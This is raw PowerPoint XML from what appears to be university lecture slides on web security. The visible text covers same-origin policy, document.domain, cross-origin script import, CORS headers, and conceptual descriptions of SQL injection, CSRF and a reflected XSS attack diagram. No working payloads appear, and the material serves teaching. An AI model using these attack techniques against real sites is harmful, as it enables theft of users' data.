            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="2819400" cy="1722438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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375" y="1960563"/>
            <a:ext cx="936625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6325" y="2976563"/>
            <a:ext cx="11430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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3242714">
            <a:off x="2507456" y="2634457"/>
            <a:ext cx="1482725" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37719"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1581150"/>
            <a:ext cx="2497138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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36873" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3065463" y="4060825"/>
            <a:ext cx="2497137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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3471863"/>
            <a:ext cx="2057400" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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pic>
        <p:nvPicPr>
          <p:cNvPr id="36875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581400"/>
            <a:ext cx="762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76" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="4306888"/>
            <a:ext cx="1816100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i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36877" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2392363" y="3581400"/>
            <a:ext cx="1223962" cy="304800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6" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3405188"/>
            <a:ext cx="2286000" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F8DD6C"/>
              </a:gs>
              <a:gs pos="20000">
                <a:srgbClr val="F4DB6E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BBA753"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E9D57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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36879" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6032500" y="4229100"/>
            <a:ext cx="19399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latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36880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471863"/>
            <a:ext cx="762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68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0975" y="2073275"/>
            <a:ext cx="936625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82" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1676400"/>
            <a:ext cx="2413000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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6510338" y="2759075"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1862138" y="2759075"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4705350" y="3657600"/>
            <a:ext cx="1309688" cy="327025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665413" y="3459163"/>
            <a:ext cx="655637" cy="601662"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36889" name="Straight Connector 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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6890" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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096000" y="4210050"/>
            <a:ext cx="1792288" cy="361950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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com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065463" y="4060825"/>
            <a:ext cx="2497137" cy="361950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</p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="501924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5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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Picture 2" descr="C:\Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 13 vul_disclos_web_ap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1770063"/>
            <a:ext cx="5086350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C:\Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 14 vulns disclosures_p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884363"/>
            <a:ext cx="3489325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Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Server-client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>in different origin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Library import</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CORS (cross origin resource sharing) in HTML5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0970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Library import</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819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200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=https://seal.verisign.com/getseal?host_name=a.com&gt;&lt;/script&gt;</a:t>
            </a:r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1900" dirty="0" smtClean="0"/>
              <a:t>Script has privileges of imported page, NOT source server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Can script other pages in this origin, load more scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Other forms of importing</a:t>
            </a:r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Font typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:cs typeface="Tahoma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200" dirty="0" smtClean="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4" descr="a.co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673350"/>
            <a:ext cx="37592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750" y="3359150"/>
            <a:ext cx="10795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6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="3522663"/>
            <a:ext cx="11461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charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>VeriSign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rot="10800000" flipH="1" flipV="1">
            <a:off x="5302250" y="3798888"/>
            <a:ext cx="1739900" cy="315912"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="54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2950" y="3586163"/>
            <a:ext cx="8128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rgbClr val="FFFFFF">
                <a:alpha val="50000"/>
              </a:srgbClr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8950" y="3852863"/>
            <a:ext cx="1041400" cy="649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4826" name="Picture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5780088"/>
            <a:ext cx="1041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20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4773613" y="5780088"/>
            <a:ext cx="8588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32" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect l="48813"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5740400" y="5867400"/>
            <a:ext cx="8128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1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5867400"/>
            <a:ext cx="71596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90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ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRP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549275" y="2079625"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="296863" lvl="1" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Cross-origin network requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: &lt;list of domains&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym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374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Cross Site Scripting  (XSS)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9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533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr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Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site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743200" y="2035175"/>
            <a:ext cx="3962400" cy="3320911"/>
            <a:chOff x="2743200" y="2035175"/>
            <a:chExt cx="3962400" cy="3320911"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4648200"/>
              <a:ext cx="3962400" cy="70788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smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim browser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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43200" y="3330575"/>
              <a:ext cx="3962400" cy="70788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smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker site forges request from victim browser to victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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43200" y="2035175"/>
              <a:ext cx="3962400" cy="70788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smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458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77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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="304800"/>
            <a:ext cx="9067800" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="Picture 18" descr="toshiba_satellite_a105_s4284_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01913"/>
            <a:ext cx="1436688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1" descr="CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="11557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DS15server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4188" y="1905000"/>
            <a:ext cx="2436812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943600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a: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5562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12296" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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228600" y="3886200"/>
            <a:ext cx="1557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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1733550"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12299" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="77311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300" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2270125"/>
            <a:ext cx="2576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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12301" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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302" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="263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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12304" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="194945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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="260667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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
